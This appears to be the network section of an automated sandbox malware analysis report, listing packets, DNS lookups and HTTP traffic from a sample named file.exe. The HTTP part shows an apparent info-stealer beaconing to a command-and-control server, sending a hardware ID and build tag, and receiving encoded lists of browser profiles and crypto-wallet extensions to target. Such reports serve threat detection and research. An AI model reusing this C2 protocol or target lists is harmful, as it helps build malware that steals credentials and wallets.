Nov 23, 2024 07:09:44.644357920 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.644393921 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.645401001 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.645464897 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.645523071 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.645617962 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.646652937 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.646723986 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.646754026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.646820068 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.647744894 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.647790909 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.647835970 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.647881985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.648865938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.648912907 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.648915052 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.648955107 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.649991035 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.650046110 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.650087118 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.650125980 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.651123047 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.651176929 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.651287079 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.651331902 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.652251959 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.652307034 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.652349949 CET	80	49817	185.215.113.206	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 07:09:22.224956036 CET	192.168.2.6	1.1.1.1	0x42ff	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:22.226938963 CET	192.168.2.6	1.1.1.1	0x75a2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:29.177778959 CET	192.168.2.6	1.1.1.1	0xfa52	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:29.177958965 CET	192.168.2.6	1.1.1.1	0xfb07	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:34.090678930 CET	192.168.2.6	1.1.1.1	0xff81	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:34.090841055 CET	192.168.2.6	1.1.1.1	0xf566	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:36.664525032 CET	192.168.2.6	1.1.1.1	0xa0c2	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:36.664681911 CET	192.168.2.6	1.1.1.1	0x7ed4	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 23, 2024 07:09:37.610327005 CET	192.168.2.6	1.1.1.1	0x94b	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:37.610515118 CET	192.168.2.6	1.1.1.1	0xc2db	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:38.919320107 CET	192.168.2.6	1.1.1.1	0xac7f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:38.920098066 CET	192.168.2.6	1.1.1.1	0xd5a8	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:38.921907902 CET	192.168.2.6	1.1.1.1	0x921c	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:38.922100067 CET	192.168.2.6	1.1.1.1	0x8528	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:38.929740906 CET	192.168.2.6	1.1.1.1	0xec48	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:38.929893970 CET	192.168.2.6	1.1.1.1	0xfdb4	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:40.717057943 CET	192.168.2.6	1.1.1.1	0xbebe	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.717222929 CET	192.168.2.6	1.1.1.1	0x539c	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:40.728132963 CET	192.168.2.6	1.1.1.1	0x1706	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.728405952 CET	192.168.2.6	1.1.1.1	0x6d6b	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:40.855735064 CET	192.168.2.6	1.1.1.1	0x5bfd	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.856043100 CET	192.168.2.6	1.1.1.1	0x9d18	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 23, 2024 07:09:42.407342911 CET	192.168.2.6	1.1.1.1	0xb9e0	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:42.407543898 CET	192.168.2.6	1.1.1.1	0x8af4	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 23, 2024 07:10:37.848984003 CET	192.168.2.6	1.1.1.1	0x582e	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:10:37.849116087 CET	192.168.2.6	1.1.1.1	0x9ad6	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
2024-11-23 06:09:41 UTC	192.168.2.6	162.159.61.3	0x0	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	true

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 07:09:22.362349987 CET	1.1.1.1	192.168.2.6	0x42ff	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:22.363961935 CET	1.1.1.1	192.168.2.6	0x75a2	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 23, 2024 07:09:29.315571070 CET	1.1.1.1	192.168.2.6	0xfb07	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:29.315783978 CET	1.1.1.1	192.168.2.6	0xfa52	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:29.315783978 CET	1.1.1.1	192.168.2.6	0xfa52	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:30.659145117 CET	1.1.1.1	192.168.2.6	0xeb40	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:30.659145117 CET	1.1.1.1	192.168.2.6	0xeb40	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:30.659145117 CET	1.1.1.1	192.168.2.6	0xeb40	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:34.227633953 CET	1.1.1.1	192.168.2.6	0xff81	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:34.230529070 CET	1.1.1.1	192.168.2.6	0xf566	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:34.647733927 CET	1.1.1.1	192.168.2.6	0x93c0	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:34.647733927 CET	1.1.1.1	192.168.2.6	0x93c0	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:34.849342108 CET	1.1.1.1	192.168.2.6	0xd9e7	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:36.801187038 CET	1.1.1.1	192.168.2.6	0xa0c2	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:36.802087069 CET	1.1.1.1	192.168.2.6	0x7ed4	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:37.747637987 CET	1.1.1.1	192.168.2.6	0x94b	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:37.747637987 CET	1.1.1.1	192.168.2.6	0x94b	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.97	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:37.748527050 CET	1.1.1.1	192.168.2.6	0xc2db	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:39.056448936 CET	1.1.1.1	192.168.2.6	0xac7f	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:39.056448936 CET	1.1.1.1	192.168.2.6	0xac7f	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:39.058561087 CET	1.1.1.1	192.168.2.6	0xd5a8	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 23, 2024 07:09:39.058749914 CET	1.1.1.1	192.168.2.6	0x921c	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:39.058749914 CET	1.1.1.1	192.168.2.6	0x921c	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:39.058871031 CET	1.1.1.1	192.168.2.6	0x8528	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 23, 2024 07:09:39.066941023 CET	1.1.1.1	192.168.2.6	0xfdb4	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 23, 2024 07:09:39.067533016 CET	1.1.1.1	192.168.2.6	0xec48	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:39.067533016 CET	1.1.1.1	192.168.2.6	0xec48	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.779355049 CET	1.1.1.1	192.168.2.6	0x9950	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:40.779355049 CET	1.1.1.1	192.168.2.6	0x9950	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.853894949 CET	1.1.1.1	192.168.2.6	0xbebe	No error (0)	sb.scorecardresearch.com		18.165.220.106	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.853894949 CET	1.1.1.1	192.168.2.6	0xbebe	No error (0)	sb.scorecardresearch.com		18.165.220.110	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.853894949 CET	1.1.1.1	192.168.2.6	0xbebe	No error (0)	sb.scorecardresearch.com		18.165.220.66	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.853894949 CET	1.1.1.1	192.168.2.6	0xbebe	No error (0)	sb.scorecardresearch.com		18.165.220.57	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:09:40.865197897 CET	1.1.1.1	192.168.2.6	0x1706	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:40.868185997 CET	1.1.1.1	192.168.2.6	0x6d6b	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:40.992599964 CET	1.1.1.1	192.168.2.6	0x5bfd	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:40.993146896 CET	1.1.1.1	192.168.2.6	0x9d18	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:42.544604063 CET	1.1.1.1	192.168.2.6	0x8af4	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:09:42.545079947 CET	1.1.1.1	192.168.2.6	0xb9e0	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:10:37.987714052 CET	1.1.1.1	192.168.2.6	0x582e	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:10:38.082228899 CET	1.1.1.1	192.168.2.6	0x9ad6	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 23, 2024 07:10:38.314311981 CET	1.1.1.1	192.168.2.6	0x1	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 23, 2024 07:10:38.314311981 CET	1.1.1.1	192.168.2.6	0x1	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
2024-11-23 06:09:41 UTC	162.159.61.3	192.168.2.6	0x0	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	true

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	185.215.113.206	80	2128	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:09:13.703495979 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 23, 2024 07:09:15.034905910 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:15.103607893 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 42 38 43 44 45 41 36 31 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 2d 2d 0d 0a Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="hwid"CFB8CDEA61BD3120641781------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build"mars------EHCBAAAFHJDHJJKEBGHI--
Nov 23, 2024 07:09:15.554563999 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 54 5a 69 4d 32 46 6c 4f 44 59 30 5a 6a 63 77 4e 6a 4d 34 4d 7a 41 31 59 54 67 34 4e 32 55 77 4f 57 55 31 59 7a 46 68 4f 57 51 77 4d 44 6b 78 59 6d 4a 6a 5a 6a 41 78 4d 44 64 69 4d 54 45 7a 4f 44 4e 6b 59 32 52 68 5a 47 4d 35 59 32 59 32 59 7a 67 77 4e 47 4a 6c 4e 6a 68 6d 4d 7a 42 6d 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NTZiM2FlODY0ZjcwNjM4MzA1YTg4N2UwOWU1YzFhOWQwMDkxYmJjZjAxMDdiMTEzODNkY2RhZGM5Y2Y2YzgwNGJlNjhmMzBmfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 23, 2024 07:09:15.555835962 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="message"browsers------AKECBFBAEBKJJJJKFCGC--
Nov 23, 2024 07:09:15.996042013 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 23, 2024 07:09:15.996151924 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 23, 2024 07:09:15.997633934 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKK Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="message"plugins------CGIDGCGIEGDGDGDGHJKK--
Nov 23, 2024 07:09:16.437462091 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: 